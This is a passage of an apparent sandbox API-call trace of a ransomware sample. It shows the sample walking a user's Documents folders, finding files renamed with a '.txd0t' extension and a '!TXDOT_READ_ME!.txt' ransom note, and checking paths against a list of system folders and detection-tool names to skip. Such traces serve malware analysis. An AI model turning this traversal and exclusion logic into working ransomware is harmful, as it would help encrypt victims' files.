returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.142] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\*", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*" [0090.142] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\*", lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2670 [0090.142] StrCmpW (psz1=".", psz2=".") returned 0 [0090.142] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0090.143] StrCmpW (psz1="..", psz2=".") returned 1 [0090.143] StrCmpW (psz1="..", psz2="..") returned 0 [0090.143] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51aafdfc, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ad86aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0090.143] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0090.143] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0090.143] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.143] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.143] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\!TXDOT_READ_ME!.txt" [0090.143] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0090.143] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0090.143] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0090.143] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0090.143] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0090.143] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0090.143] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0090.144] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0090.144] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5030a3b0, ftCreationTime.dwHighDateTime=0x1d5eb9f, ftLastAccessTime.dwLowDateTime=0x7ca2aee0, ftLastAccessTime.dwHighDateTime=0x1d5ee6d, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3791, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="iTea.pptx.txd0t", cAlternateFileName="ITEAPP~1.TXD")) returned 1 [0090.144] StrCmpW (psz1="iTea.pptx.txd0t", psz2=".") returned 1 [0090.144] StrCmpW (psz1="iTea.pptx.txd0t", psz2="..") returned 1 [0090.144] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.144] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.144] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="iTea.pptx.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\iTea.pptx.txd0t" [0090.144] PathFindExtensionW (pszPath="iTea.pptx.txd0t") returned=".txd0t" [0090.144] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.144] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf065b200, ftCreationTime.dwHighDateTime=0x1d5e1e3, ftLastAccessTime.dwLowDateTime=0xdee60400, ftLastAccessTime.dwHighDateTime=0x1d5e5e7, ftLastWriteTime.dwLowDateTime=0x51ad86aa, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x113d8, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="PoJjjS_vt-KW.doc.txd0t", cAlternateFileName="POJJJS~1.TXD")) returned 1 [0090.144] StrCmpW (psz1="PoJjjS_vt-KW.doc.txd0t", psz2=".") returned 1 [0090.144] StrCmpW (psz1="PoJjjS_vt-KW.doc.txd0t", psz2="..") returned 1 [0090.144] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.144] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.144] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="PoJjjS_vt-KW.doc.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\PoJjjS_vt-KW.doc.txd0t" [0090.144] PathFindExtensionW (pszPath="PoJjjS_vt-KW.doc.txd0t") returned=".txd0t" [0090.144] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.144] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f46e60, ftCreationTime.dwHighDateTime=0x1d5e102, ftLastAccessTime.dwLowDateTime=0xe5bb2500, ftLastAccessTime.dwHighDateTime=0x1d5eff9, ftLastWriteTime.dwLowDateTime=0x51afc2f0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x184b4, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="RcZvqUQNfrhT.rtf.txd0t", cAlternateFileName="RCZVQU~1.TXD")) returned 1 [0090.144] StrCmpW (psz1="RcZvqUQNfrhT.rtf.txd0t", psz2=".") returned 1 [0090.144] StrCmpW (psz1="RcZvqUQNfrhT.rtf.txd0t", psz2="..") returned 1 [0090.144] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.144] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.144] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="RcZvqUQNfrhT.rtf.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\RcZvqUQNfrhT.rtf.txd0t" [0090.144] PathFindExtensionW (pszPath="RcZvqUQNfrhT.rtf.txd0t") returned=".txd0t" [0090.144] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.144] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f6cca00, ftCreationTime.dwHighDateTime=0x1d5e63f, ftLastAccessTime.dwLowDateTime=0x600cb1a0, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x51b224ff, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13f1b, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tPNskvgoa.ots.txd0t", cAlternateFileName="TPNSKV~1.TXD")) returned 1 [0090.144] StrCmpW (psz1="tPNskvgoa.ots.txd0t", psz2=".") returned 1 [0090.145] StrCmpW (psz1="tPNskvgoa.ots.txd0t", psz2="..") returned 1 [0090.145] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.145] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.145] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tPNskvgoa.ots.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tPNskvgoa.ots.txd0t" [0090.145] PathFindExtensionW (pszPath="tPNskvgoa.ots.txd0t") returned=".txd0t" [0090.145] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.145] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70d732c0, ftCreationTime.dwHighDateTime=0x1d5ec83, ftLastAccessTime.dwLowDateTime=0xed8ee220, ftLastAccessTime.dwHighDateTime=0x1d5e974, ftLastWriteTime.dwLowDateTime=0x51b224ff, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcfaa, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="tYF1BO7xWTgAbs uk76.csv.txd0t", cAlternateFileName="TYF1BO~1.TXD")) returned 1 [0090.145] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv.txd0t", psz2=".") returned 1 [0090.145] StrCmpW (psz1="tYF1BO7xWTgAbs uk76.csv.txd0t", psz2="..") returned 1 [0090.145] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.145] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.145] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="tYF1BO7xWTgAbs uk76.csv.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\tYF1BO7xWTgAbs uk76.csv.txd0t" [0090.145] PathFindExtensionW (pszPath="tYF1BO7xWTgAbs uk76.csv.txd0t") returned=".txd0t" [0090.145] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.145] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb48a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt.txd0t", cAlternateFileName="VTQY5Q~1.TXD")) returned 1 [0090.145] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt.txd0t", psz2=".") returned 1 [0090.145] StrCmpW (psz1="vTQY5QAfnqPKv2th.odt.txd0t", psz2="..") returned 1 [0090.145] StrCpyNW (in: psz1=0xecdb80, psz2="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks" [0090.145] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks", psz2="\\", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\" [0090.145] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\", psz2="vTQY5QAfnqPKv2th.odt.txd0t", cchMax=1164 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui\\_L78DH7wK y2TBjiEU\\_HV0qcp0pks\\vTQY5QAfnqPKv2th.odt.txd0t" [0090.145] PathFindExtensionW (pszPath="vTQY5QAfnqPKv2th.odt.txd0t") returned=".txd0t" [0090.145] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.145] FindNextFileW (in: hFindFile=0xec2670, lpFindFileData=0x561ea00 | out: lpFindFileData=0x561ea00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fd487f0, ftCreationTime.dwHighDateTime=0x1d5e930, ftLastAccessTime.dwLowDateTime=0x54780280, ftLastAccessTime.dwHighDateTime=0x1d5ed2d, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xb48a, dwReserved0=0x700e7e, dwReserved1=0x0, cFileName="vTQY5QAfnqPKv2th.odt.txd0t", cAlternateFileName="VTQY5Q~1.TXD")) returned 0 [0090.145] FindClose (in: hFindFile=0xec2670 | out: hFindFile=0xec2670) returned 1 [0090.145] GetProcessHeap () returned 0xe30000 [0090.145] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecdb80 | out: hHeap=0xe30000) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xec2430, lpFindFileData=0x561ecb0 | out: lpFindFileData=0x561ecb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x975770, ftCreationTime.dwHighDateTime=0x1d5e9ad, ftLastAccessTime.dwLowDateTime=0x51b6eaa7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51b6eaa7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_HV0qcp0pks", cAlternateFileName="_HV0QC~1")) returned 0 [0090.145] FindClose (in: hFindFile=0xec2430 | out: hFindFile=0xec2430) returned 1 [0090.145] GetProcessHeap () returned 0xe30000 [0090.145] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7f38 | out: hHeap=0xe30000) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x561ef60 | out: lpFindFileData=0x561ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf966ba0, ftCreationTime.dwHighDateTime=0x1d5f04a, ftLastAccessTime.dwLowDateTime=0x51aafdfc, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51aafdfc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="_L78DH7wK y2TBjiEU", cAlternateFileName="_L78DH~1")) returned 0 [0090.146] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0090.146] GetProcessHeap () returned 0xe30000 [0090.146] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7a60 | out: hHeap=0xe30000) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 0 [0090.146] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0090.146] GetProcessHeap () returned 0xe30000 [0090.146] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec75a0 | out: hHeap=0xe30000) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x561f4c0 | out: lpFindFileData=0x561f4c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa2dc870b, ftLastAccessTime.dwHighDateTime=0x1d5d80c, ftLastWriteTime.dwLowDateTime=0xa2dc870b, ftLastWriteTime.dwHighDateTime=0x1d5d80c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0090.146] StrCmpW (psz1="Downloads", psz2=".") returned 1 [0090.146] StrCmpW (psz1="Downloads", psz2="..") returned 1 [0090.146] StrCpyNW (in: psz1=0xec60f0, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0090.146] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0090.146] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="Downloads", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\Downloads") returned="C:\\Users\\FD1HVy\\Downloads" [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system32\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\syswow64\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\system\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\windows\\winsxs\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\roaming\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\local\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\appdata\\locallow\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\all users\\microsoft\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="\\inetpub\\logs\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\boot\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\perflogs\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\programdata\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\drivers\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\wsus\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\efstmpwp\\") returned 0x0 [0090.146] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch=":\\$recycle.bin\\") returned 0x0 [0090.147] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="crypt_detect") returned 0x0 [0090.147] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="cryptolocker") returned 0x0 [0090.147] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="ransomware") returned 0x0 [0090.147] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Downloads", lpSrch="C:\\WINDOWS") returned 